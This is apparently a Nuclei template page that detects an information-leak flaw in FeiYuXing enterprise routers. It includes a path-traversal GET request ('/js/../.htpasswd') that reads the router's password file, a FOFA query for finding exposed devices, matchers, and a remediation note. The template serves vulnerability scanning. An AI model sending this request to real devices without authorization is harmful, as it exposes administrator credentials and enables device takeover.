FeiYuXing Enterprise Router - Information Leakage
ID: feiyuxing-ent-router-infoleak
Severity: high
Author: adeljck
Tags: feiyuxing,info-leak,disclosure
Description
Section titled “Description”The FeiYuXing Enterprise Router Information Leakage Vulnerability is a critical flaw that allows unauthorized attackers to retrieve sensitive configuration details from the router.
YAML Source
Section titled “YAML Source”id: feiyuxing-ent-router-infoleak
info: name: FeiYuXing Enterprise Router - Information Leakage author: adeljck severity: high description: | The FeiYuXing Enterprise Router Information Leakage Vulnerability is a critical flaw that allows unauthorized attackers to retrieve sensitive configuration details from the router. impact: | Exploiting this vulnerability enables an attacker to gain access to stored credentials, including administrative usernames and passwords, which can lead to a complete compromise of the device. remediation: | Update the frimware to the latest version. If your device is out of service.add path /js/../.htpasswd to your WAF. metadata: verified: true max-request: 1 fofa-query: body="js/select2css.js" tags: feiyuxing,info-leak,disclosure
http: - method: GET path: - "{{BaseURL}}/js/../.htpasswd"
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/plain")' - 'contains_all(body, "$", ":")' - 'contains(server, "Router Web")' condition: and# digest: 4a0a0047304502201e8b37ecfa27e79620f37336bc06960728e32b95fc90632927a282ab562aa59f0221008e6e47f5ea259bc970400037079544fd764ddec799d4f7882cfc5d9898897f37:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/feiyuxing/feiyuxing-ent-router-infoleak.yaml"